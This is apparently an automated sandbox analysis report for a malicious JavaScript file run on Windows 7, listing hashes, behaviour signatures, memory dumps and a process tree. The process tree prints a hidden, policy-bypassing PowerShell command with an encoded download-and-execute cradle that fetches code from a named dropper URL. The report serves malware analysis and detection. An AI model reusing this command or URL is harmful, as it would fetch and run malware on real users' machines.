Analysis

  • max time kernel
    21s
  • max time network
    48s
  • platform
    windows7_x64
  • resource
    win7-20220812-en
  • resource tags

    arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system
  • submitted
    19-09-2022 08:20

General

  • Target

    0be62b1ccacefae5561af9248f0c11db.js

  • Size

    286KB

  • MD5

    0be62b1ccacefae5561af9248f0c11db

  • SHA1

    4c34672f7dffc832b45c4ee83f71fc715b33cefa

  • SHA256

    c2b758e7f617497e86e881bdbe78ea1c399c6316311adf45b4d1ea8d7c74a945

  • SHA512

    7d0cb616f19871f84c28c5cc8124d7a00b09192193d516b0f3981c3ec1bb3b2f478f8d7bd7570d4327c316325951e2a350bdddfc5e3af21c769ba001ae85d1d5

  • SSDEEP

    3072:qrjVJySRCL1ddImO3NwSa0wQwRCijyQL7oebGpTLW+B57wtH:qASkdIn9lpQL7oebGRLQH

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://freedompublishingbooks.com.au/index/

Signatures

  • Blocklisted process makes network request 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Windows\system32\wscript.exe
    wscript.exe C:\Users\Admin\AppData\Local\Temp\0be62b1ccacefae5561af9248f0c11db.js
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2044
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c pOwErShElL -NoP -w hIDdeN -eP BYPAsS -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwBmAHIAZQBlAGQAbwBtAHAAdQBiAGwAaQBzAGgAaQBuAGcAYgBvAG8AawBzAC4AYwBvAG0ALgBhAHUALwBpAG4AZABlAHgALwAiACkA
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2032
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        pOwErShElL -NoP -w hIDdeN -eP BYPAsS -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwBmAHIAZQBlAGQAbwBtAHAAdQBiAGwAaQBzAGgAaQBuAGcAYgBvAG8AawBzAC4AYwBvAG0ALgBhAHUALwBpAG4AZABlAHgALwAiACkA
        3⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:956

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/956-55-0x0000000000000000-mapping.dmp

  • memory/956-56-0x000007FEFC4E1000-0x000007FEFC4E3000-memory.dmp

    Filesize

    8KB

  • memory/956-57-0x000007FEF49F0000-0x000007FEF5413000-memory.dmp

    Filesize

    10.1MB

  • memory/956-59-0x00000000027E4000-0x00000000027E7000-memory.dmp

    Filesize

    12KB

  • memory/956-58-0x000007FEF3E90000-0x000007FEF49ED000-memory.dmp

    Filesize

    11.4MB

  • memory/956-60-0x00000000027EB000-0x000000000280A000-memory.dmp

    Filesize

    124KB

  • memory/956-61-0x00000000027E4000-0x00000000027E7000-memory.dmp

    Filesize

    12KB

  • memory/956-62-0x00000000027E4000-0x00000000027E7000-memory.dmp

    Filesize

    12KB

  • memory/956-63-0x00000000027EB000-0x000000000280A000-memory.dmp

    Filesize

    124KB

  • memory/2032-54-0x0000000000000000-mapping.dmp